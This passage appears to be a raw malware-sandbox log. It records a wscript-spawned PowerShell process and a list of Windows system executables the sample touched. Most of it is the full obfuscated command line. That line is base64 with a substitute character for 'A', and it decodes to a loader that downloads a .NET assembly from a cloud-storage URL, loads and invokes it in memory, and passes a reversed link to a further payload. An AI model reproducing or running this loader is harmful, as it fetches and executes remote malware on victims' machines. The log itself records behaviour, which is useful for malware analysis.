▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = 
$KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( 
[system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\envifa.vbs');powershell -command $KByHL;
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe